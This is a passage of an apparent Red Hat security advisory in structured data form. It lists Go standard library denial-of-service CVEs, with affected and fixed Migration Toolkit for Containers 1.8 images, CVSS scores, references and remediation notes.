"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses", }, { cve: "CVE-2024-24791", cwe: { id: "CWE-20", name: "Improper Input Validation", }, discovery_date: "2024-07-02T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2295310", }, ], notes: [ { category: "description", text: "A flaw was found in Go. The net/http module mishandles specific server responses from HTTP/1.1 client requests. This issue may render a connection invalid and cause a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "net/http: Denial of service due to improper 100-continue handling in net/http", title: "Vulnerability summary", }, { category: "other", text: "An attacker would need to control a malicious server and induce a client to connect to it, requiring some amount of preparation outside of the attacker's control. This reduces the severity score of this flaw to Moderate.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-24791", }, { category: "external", summary: "RHBZ#2295310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2295310", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-24791", url: "https://www.cve.org/CVERecord?id=CVE-2024-24791", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-24791", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-24791", }, { category: "external", summary: "https://go.dev/cl/591255", url: "https://go.dev/cl/591255", }, { category: "external", summary: "https://go.dev/issue/67555", url: "https://go.dev/issue/67555", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/t0rK-qHBqzY/m/6MMoAZkMAgAJ", url: "https://groups.google.com/g/golang-dev/c/t0rK-qHBqzY/m/6MMoAZkMAgAJ", }, ], release_date: "2024-07-02T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "net/http: Denial of service due to improper 100-continue handling in net/http", }, { cve: "CVE-2024-34155", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-09-06T21:20:06.929766+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310527", }, ], notes: [ { category: "description", text: "A flaw was found in the go/parser package of the Golang standard library. Calling any Parse functions on Go source code containing deeply nested literals can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34155", }, { category: "external", summary: "RHBZ#2310527", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310527", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34155", url: "https://www.cve.org/CVERecord?id=CVE-2024-34155", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34155", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34155", }, { category: "external", summary: "https://go.dev/cl/611238", url: "https://go.dev/cl/611238", }, { category: "external", summary: "https://go.dev/issue/69138", url: "https://go.dev/issue/69138", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3105", url: "https://pkg.go.dev/vuln/GO-2024-3105", }, ], release_date: "2024-09-06T21:15:11.947000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion", }, { cve: "CVE-2024-34156", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-09-06T21:20:09.377905+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310528", }, ], notes: [ { category: "description", text: "A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.", title: "Vulnerability description", }, { category: "summary", text: "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability in Go's `encoding/gob` package is of high severity because it exposes applications to potential Denial of Service (DoS) attacks through stack exhaustion. Since `gob` relies on recursive function calls to decode nested structures, an attacker could exploit this by sending crafted messages with excessively deep nesting, causing the application to panic due to stack overflow. This risk is particularly important in scenarios where untrusted or external input is processed, as it can lead to system unavailability or crashes, undermining the reliability and availability of services.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34156", }, { category: "external", summary: "RHBZ#2310528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310528", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34156", url: "https://www.cve.org/CVERecord?id=CVE-2024-34156", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34156", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34156", }, { category: "external", summary: "https://go.dev/cl/611239", url: "https://go.dev/cl/611239", }, { category: "external", summary: "https://go.dev/issue/69139", url: "https://go.dev/issue/69139", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3106", url: "https://pkg.go.dev/vuln/GO-2024-3106", }, ], release_date: "2024-09-06T21:15:12.020000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", 